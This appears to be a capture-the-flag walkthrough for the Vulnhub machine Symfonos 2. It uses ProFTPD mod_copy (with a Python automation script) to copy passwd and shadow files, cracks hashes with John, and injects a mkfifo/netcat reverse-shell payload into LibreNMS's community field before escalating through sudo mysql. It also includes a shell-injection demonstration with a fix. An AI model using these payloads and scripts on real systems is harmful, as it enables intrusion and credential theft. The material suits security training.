Symfonos 2
Walkthrough of the Symfonos 2 machine from Vulnhub
Obtaining the target machine's IP address
The first thing we are going to do is find out the IP address of the target machine. To do this we use nmap with a ping scan (-sn) against the whole network we are currently on. If we are not root it is recommended to run it with sudo: nmap then discovers hosts with ARP requests and also reports the MAC address and vendor of each device, which makes it easier to tell them apart:
nmap -sn 192.168.56.0/24
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:35 CEST
Nmap scan report for 192.168.56.1
Host is up (0.00052s latency).
Nmap scan report for 192.168.56.13
Host is up (0.00016s latency).
Nmap scan report for 192.168.56.15
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.95 seconds
Nmap tells us that the IP of the target machine is the following, since 192.168.56.1 is the gateway of the network and 192.168.56.13 is the IP of the attacking machine:
192.168.56.15
If the target is a virtual machine we can confirm this by checking that the MAC address nmap reports (when run with sudo) matches the one configured on the VM's network adapter.
The next thing we are going to do is to add the IP of the target machine to our /etc/hosts. This way we won't need to remember the IP and we can use whatever name we give it. We edit the /etc/hosts file and add the following line at the end of it:
192.168.56.15 symfonos2.ctf
Now if we run ping symfonos2.ctf -c 1 we should get the following response:
PING symfonos2.ctf (192.168.56.15) 56(84) bytes of data.
64 bytes from symfonos2.ctf (192.168.56.15): icmp_seq=1 ttl=64 time=0.651 ms

--- symfonos2.ctf ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.651/0.651/0.651/0.000 ms
This confirms that the hostname we assigned resolves correctly.
Port scanning
Once we have the IP of the target machine, the next step is to detect which ports it has open. To do this we launch another nmap scan against the entire TCP port range (-p-), using the fastest timing template (-T5), showing only open ports (--open), and disabling DNS resolution (-n) and host discovery (-Pn), since we already know the host is up. Two caveats: -T5 is fast but can drop responses on a noisy network, so if a port you expect is missing repeat the scan with -T4; and as a non-root user this is a TCP connect scan (hence the "conn-refused" in the output) that says nothing about UDP services:
nmap -p- -T5 --open -Pn -n symfonos2.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:51 CEST
Nmap scan report for symfonos2.ctf (192.168.56.15)
Host is up (0.00013s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
From this scan we learn that the following ports are open: 21 (FTP), 22 (SSH), 80 (HTTP), 139 (NETBIOS-SSN) and 445 (MICROSOFT-DS). Knowing this, the next thing we do is identify the services behind those ports and their versions, running the default script set (-sC) together with version detection (-sV), abbreviated as -sCV:
nmap -p 21,22,80,139,445 -sCV symfonos2.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:53 CEST
Nmap scan report for symfonos2.ctf (192.168.56.15)
Host is up (0.00036s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 9df85f8720e58cfa68477d716208adb9 (RSA)
|   256 042abb0656ead1931cd2780a00469d85 (ECDSA)
|_  256 28adacdc7e2a1cf64c6b47f2d6225b52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2023-04-23T03:53:58-05:00
|_clock-skew: mean: 3h39m55s, deviation: 2h53m12s, median: 1h59m55s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-04-23T08:53:58
|_  start_date: N/A
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.91 seconds
From the result of the more detailed scan we obtain the following:
- 21/tcp: FTP - ProFTPD 1.3.5
- 22/tcp: SSH - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
- 80/tcp: HTTP - WebFS httpd 1.21
- 139/tcp: NETBIOS-SSN - Samba smbd 3.X - 4.X
- 445/tcp: NETBIOS-SSN - Samba smbd 4.5.16-Debian
The ProFTPD version is worth noting: 1.3.5 ships the mod_copy module, whose SITE CPFR and SITE CPTO commands copy files on the server and are accepted even from a session that has not authenticated (CVE-2015-3306). We will come back to this. The SMB scripts also show that a guest account is accepted, which suggests anonymous access to the shares.
Enumeration of the SAMBA service (445/SMB)
In the port scan we saw that the SMB service, used for file sharing, is exposed. Often no authentication is required to access these shares, so let's use smbclient to list (-L) the shared resources (pressing enter at the password prompt sends an empty password; passing -N skips the prompt altogether):
smbclient -L //symfonos2.ctf
Result (pressing enter without entering a password):
Password for [WORKGROUP\parrot]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
The result shows a share that looks interesting: anonymous. The next thing we do is connect to that share as guest (-U guest) and try to access its contents:
smbclient //symfonos2.ctf/anonymous -U guest
Result (pressing enter without entering a password):
Try "help" to get a list of possible commands. smb: \>
Now that we are connected we list the contents with the ls command:
smb: \> ls
  .                                   D        0  Thu Jul 18 16:30:09 2019
  ..                                  D        0  Thu Jul 18 16:29:08 2019
  backups                             D        0  Thu Jul 18 16:25:17 2019

		19728000 blocks of size 1024. 16314092 blocks available
If we browse into the backups directory we find a single file, backups/log.txt, which we download to the attacking machine with get (cd backups, then get log.txt). Reviewing it, we see it is a log of commands together with their output. We can extract the following useful information from it:
- A copy of the /etc/shadow file has been made to /var/backups/shadow.bak, so both files exist.
- The /anonymous/ resource is located in the /home/aeolus/share path, which also reveals the existence of a aeolus user.
- We can connect via FTP by making use of the anonymous user without providing a password.
With this in hand, the next thing we can do is copy /var/backups/shadow.bak and /etc/passwd via FTP into the directory backing the SMB share, so that we can then read them over SMB. This uses ProFTPD's mod_copy: we run ftp symfonos2.ctf, log in as anonymous, and then issue site cpfr to name the source of the copy and site cpto to name the destination. Note in the session below that the anonymous login is actually rejected (530 Login incorrect), yet the SITE CPFR/CPTO commands still succeed: mod_copy in ProFTPD 1.3.5 does not require an authenticated session, which is exactly what makes it exploitable. The copies are written with the privileges of the FTP daemon, so they succeed only where that process can read the source and write the destination; here both work:
Connected to symfonos2.ctf.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.15]
Name (symfonos2.ctf:parrot): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site cpfr /etc/passwd
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/passwd
250 Copy successful
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.bak
250 Copy successful
ftp> exit
221 Goodbye.
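The same SITE CPFR / SITE CPTO exchange can be scripted with Python's ftplib, which is useful when there are several files to pull. This is an added example, not code from the walkthrough; the host and the source/destination paths are the ones used above and are assumed. It keeps going when the anonymous login is refused, because (as the session above shows) mod_copy answers SITE commands before authentication, and it does not stop at the first failed copy, so a missing shadow.bak does not cost us passwd. The FakeProFTPD class is a constructed stand-in that answers with the reply lines seen above, so the logic can be exercised without a target.

```python
"""Drive ProFTPD 1.3.5 mod_copy (SITE CPFR / SITE CPTO) over ftplib.

Added example, not from the original walkthrough. Host and paths are
assumptions taken from the manual session above.
"""
from ftplib import FTP, error_perm

HOST = "symfonos2.ctf"  # assumed, from /etc/hosts above
COPIES = [
    ("/etc/passwd", "/home/aeolus/share/passwd"),
    ("/var/backups/shadow.bak", "/home/aeolus/share/shadow.bak"),
]


def connect(host, user="anonymous", password=""):
    """Open the control connection and try to log in.

    A 530 on login is not fatal: mod_copy processes SITE CPFR/CPTO
    before authentication, so we continue with the unauthenticated session.
    """
    ftp = FTP(host, timeout=15)
    try:
        ftp.login(user, password)
    except error_perm as exc:
        print(f"login refused ({exc}); continuing without authentication")
    return ftp


def mod_copy(ftp, src, dst):
    """Copy src to dst on the server; return the (CPFR, CPTO) reply lines.

    ftplib already raises error_perm on any 5xx reply; the explicit checks
    reject anything other than the expected 350 and 250 codes.
    """
    cpfr = ftp.sendcmd(f"SITE CPFR {src}")
    if not cpfr.startswith("350"):
        raise error_perm(f"unexpected CPFR reply: {cpfr}")
    cpto = ftp.sendcmd(f"SITE CPTO {dst}")
    if not cpto.startswith("250"):
        raise error_perm(f"unexpected CPTO reply: {cpto}")
    return cpfr, cpto


def copy_all(ftp, copies):
    """Attempt every copy; map each source to its CPTO reply or an error string."""
    results = {}
    for src, dst in copies:
        try:
            results[src] = mod_copy(ftp, src, dst)[1]
        except error_perm as exc:
            results[src] = f"failed: {exc}"
    return results


class FakeProFTPD:
    """Constructed stand-in for the server, answering like the real replies
    in the session above, so the copy logic can be run offline."""

    def __init__(self, existing):
        self.existing = set(existing)  # paths the "server" can read
        self.sent = []                 # commands received, in order
        self.pending = None            # source named by the last CPFR

    def sendcmd(self, cmd):
        self.sent.append(cmd)
        verb, _, rest = cmd.partition(" ")
        sub, _, path = rest.partition(" ")
        if verb == "SITE" and sub == "CPFR":
            if path not in self.existing:
                raise error_perm(f"550 {path}: No such file or directory")
            self.pending = path
            return "350 File or directory exists, ready for destination name"
        if verb == "SITE" and sub == "CPTO":
            if self.pending is None:
                raise error_perm("503 Bad sequence of commands")
            self.existing.add(path)
            self.pending = None
            return "250 Copy successful"
        raise error_perm("500 Unknown command")


if __name__ == "__main__":
    session = connect(HOST)
    for src, reply in copy_all(session, COPIES).items():
        print(f"{src}: {reply}")
    session.quit()
```

After the script finishes, the copies are fetched over SMB exactly as before; if one source reports 550 the script prints that and still copies the rest.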
Once the files are copied we connect again with smbclient and download them as before. Inspecting them we see that three users on the system have a password hash set:
- root
- aeolus
- cronus
Gaining access to the target machine
Having the shadow and passwd files we can try to recover the user passwords by brute force. First we merge the two files with unshadow, then we try to crack the result with John the Ripper against the rockyou wordlist:
unshadow passwd shadow.bak > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Result (after waiting a while and stopping the process):
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sergioteamo      (aeolus)
1g 0:00:11:06 13,32% (ETA: 15:25:15) 0.001500g/s 3147p/s 6334c/s 6334C/s Roxtar04..Ritsuka1
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
The result reveals that the password of the user aeolus is sergioteamo (john --show unshadowed.txt lists it again later). If we log in with ssh aeolus@symfonos2.ctf using that password we confirm it is correct and we have a shell on the target machine.
Pivoting to the user cronus
As we saw earlier in /etc/passwd, the system also has a user cronus, so let's try to pivot to that user.
If we list our sudo privileges with sudo -l or look for SUID executables with find / -perm -4000 2>/dev/null we find nothing interesting. Another thing we can do is check whether there are services listening only internally, which a port scan from outside cannot see; we use ss for that:
ss -tulpn | grep LISTEN
Result:
tcp   LISTEN 0   80    127.0.0.1:3306   *:*
tcp   LISTEN 0   50    *:139            *:*
tcp   LISTEN 0   128   127.0.0.1:8080   *:*
tcp   LISTEN 0   32    *:21             *:*
tcp   LISTEN 0   128   *:22             *:*
tcp   LISTEN 0   20    127.0.0.1:25     *:*
tcp   LISTEN 0   50    *:445            *:*
tcp   LISTEN 0   50    :::139           :::*
tcp   LISTEN 0   64    :::80            :::*
tcp   LISTEN 0   128   :::22            :::*
tcp   LISTEN 0   20    ::1:25           :::*
tcp   LISTEN 0   50    :::445           :::*
From the result we see that port 8080 is listening only on 127.0.0.1, as is port 3306 (the default MySQL port) and 25 (SMTP); that is why the nmap scan from outside did not show them. To reach port 8080 comfortably we can set up an SSH local port forward. We disconnect from the current session and reconnect as follows:
ssh aeolus@symfonos2.ctf -L 8080:localhost:8080
This way, for as long as the session is open, port 8080 on the attacking machine is tunnelled to port 8080 on the target. If we now open http://localhost:8080 we are redirected to /login and see a LibreNMS login panel.
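The step above (read the ss listing, spot the loopback-only listeners, forward the interesting ones) is easy to get wrong by hand when a host has many sockets, especially with the mixed IPv4/IPv6 forms ss prints (*:139, :::139, ::1:25). As an added example, not part of the original walkthrough, the following Python splits the listing into externally reachable ports and loopback-only ports and builds the matching ssh -L command line. The embedded SS_LISTEN text is the listing from above, reproduced here as constructed input; the username and hostname are the ones used in this walkthrough.

```python
"""Classify `ss -tulpn | grep LISTEN` output and build ssh -L forwards.

Added example, not from the original walkthrough. SS_LISTEN is the listing
shown above, embedded here so the code runs offline.
"""

SS_LISTEN = """\
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 127.0.0.1:8080 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 64 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*
tcp LISTEN 0 50 :::445 :::*
"""

# Address prefixes that mean "loopback only": 127.0.0.0/8 and ::1.
LOOPBACK_PREFIXES = ("127.", "::1")


def parse_listeners(text):
    """Yield (proto, local_addr, port) for every LISTEN line.

    Splits the local address at the last ':' so that IPv6 forms such as
    ':::139' (wildcard) and '::1:25' (loopback) are handled. Extra columns
    (the users:(...) column ss prints when run as root) are ignored.
    """
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[1] != "LISTEN":
            continue
        addr, _, port = fields[4].rpartition(":")
        yield fields[0], addr, int(port)


def split_by_scope(text):
    """Return (external_ports, loopback_only_ports), both sorted.

    A port is loopback-only when every socket bound to it is on a loopback
    address; a single wildcard or public binding makes it external.
    """
    bindings = {}
    for _, addr, port in parse_listeners(text):
        bindings.setdefault(port, set()).add(addr)
    loopback_only = sorted(
        port for port, addrs in bindings.items()
        if all(a.startswith(LOOPBACK_PREFIXES) for a in addrs)
    )
    external = sorted(port for port in bindings if port not in loopback_only)
    return external, loopback_only


def ssh_forward_command(user, host, ports):
    """Build `ssh user@host -L p:localhost:p ...` for the chosen ports."""
    flags = " ".join(f"-L {p}:localhost:{p}" for p in ports)
    return f"ssh {user}@{host} {flags}".rstrip()


if __name__ == "__main__":
    external, internal = split_by_scope(SS_LISTEN)
    print("reachable from outside:", external)   # should match the nmap scan
    print("loopback only:", internal)
    # Forward everything internal except SMTP, which is rarely worth a look.
    print(ssh_forward_command("aeolus", "symfonos2.ctf",
                              [p for p in internal if p != 25]))
```

The external list is a useful cross-check: it should match the five ports nmap found, and any port that is external here but absent from the scan points at a firewall rule between you and the target.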
If we search for "librenms exploits" in Google we find an exploit for it in Exploit Database.
Investigating the exploit a little, we see that it sends a POST to /addhost/ with our payload in the "community" field; in the exploit's case the payload tries to establish a reverse shell with nc {remote_host} {remote_port}. The fact that the script asks for session cookies indicates that it must run as an authenticated user. Luckily the credentials aeolus / sergioteamo are valid on LibreNMS as well (password reuse).
The first thing we do is start a listener with nc:
nc -nlvp 8888
which confirms that it is listening:
listening on [any] 8888 ...
Now we go to http://localhost:8080/addhost, name the host "dummytest", tick the "Forced add" checkbox, and in the "Community" field paste the payload from the script with our own host and port:
'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.13 8888 >/tmp/f) #
The leading single quote closes the quoted community string inside the command LibreNMS builds, $( ... ) runs our command as a substitution, and the trailing # comments out whatever follows so the shell does not choke on the rest of the line. The named pipe (mkfifo) trick gives us a reverse shell even when the target's nc has no -e option.
If we confirm, we should see a message that the device was added successfully. Reviewing the exploit script, the next step is to request a URL that makes LibreNMS run an snmpwalk capture against the new host, which is when the injected command executes, so we compose it and open it in the browser:
http://localhost:8080/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=dummytest
When the page loads, we see the connection arrive at the netcat listener:
connect to [192.168.56.13] from (UNKNOWN) [192.168.56.15] 47470
/bin/sh: 0: can't access tty; job control turned off
If we check which user we are running as with whoami, we see that it is cronus.
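What the addhost step exploits is a plain shell injection: the community string is spliced into a command line that is handed to a shell. The following Python models that bug class next to its fix; it is an added illustration and not LibreNMS's code (LibreNMS is PHP, and the exact command it builds is not reproduced here). A small stand-in program that prints its argv one per line takes the place of snmpwalk, so you can see exactly what the tool would have received. The command shape (-v2c -c <community> <host> sysDescr.0) is an assumption chosen to resemble the real one; the payload is the page's '$( ... ) # pattern with a harmless echo in place of the reverse shell.

```python
"""Shell injection through an SNMP community string, modelled in Python.

Added example, not LibreNMS code. The stand-in below prints its argv so the
effect of the input on the final command is visible.
"""
import shlex
import subprocess
import sys

# Stand-in for snmpwalk: prints each argument it received on its own line.
STANDIN_ARGV = [sys.executable, "-c", "import sys; print('\\n'.join(sys.argv[1:]))"]
# Same program quoted for use inside a shell string.
STANDIN_SHELL = " ".join(shlex.quote(a) for a in STANDIN_ARGV)

# The page's payload shape, with a harmless command instead of the reverse shell.
PAYLOAD = "'$(echo INJECTED) #"


def snmpwalk_unsafe(hostname, community):
    """Vulnerable pattern: user input spliced into a shell string.

    The single quotes around {community} are the only 'protection', and the
    payload's leading quote ends them; what follows runs as shell code.
    """
    cmd = f"{STANDIN_SHELL} -v2c -c '{community}' {hostname} sysDescr.0"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.splitlines()


def snmpwalk_safe(hostname, community):
    """Hardened: an argv list and no shell, so the community string reaches
    the tool verbatim as a single argument whatever characters it contains."""
    argv = STANDIN_ARGV + ["-v2c", "-c", community, hostname, "sysDescr.0"]
    out = subprocess.run(argv, capture_output=True, text=True)
    return out.stdout.splitlines()


def community_is_sane(community):
    """Defence in depth: an allow-list for the field, since SNMP community
    strings never need shell metacharacters (assumed policy, 1-64 chars)."""
    return 0 < len(community) <= 64 and all(
        c.isalnum() or c in "-_." for c in community
    )


if __name__ == "__main__":
    print("unsafe:", snmpwalk_unsafe("symfonos2.ctf", PAYLOAD))
    print("safe:  ", snmpwalk_safe("symfonos2.ctf", PAYLOAD))
    print("allowed by allow-list:", community_is_sane(PAYLOAD))
```

With the payload, the unsafe path runs echo and the hostname never even reaches the tool (it was commented out by the #); the safe path passes the whole payload through as one harmless argument. The two fixes are independent: argv-style execution removes the shell, the allow-list rejects the input before it matters.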
Privilege escalation
If we check the privileges of the user with sudo -l we see the following:
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
As we can see, we can run /usr/bin/mysql as root without entering a password. GTFOBins shows that the mysql client can spawn a shell through its \! (system) command, and since the client itself runs as root, so does the shell it spawns. We execute:
sudo mysql -e '\! /bin/sh'
If we check which user we are running as with whoami, we see that it is root.
If we list the contents of the home directory of the root user, /root, we find the flag (proof.txt):
Congrats on rooting symphones:2! ...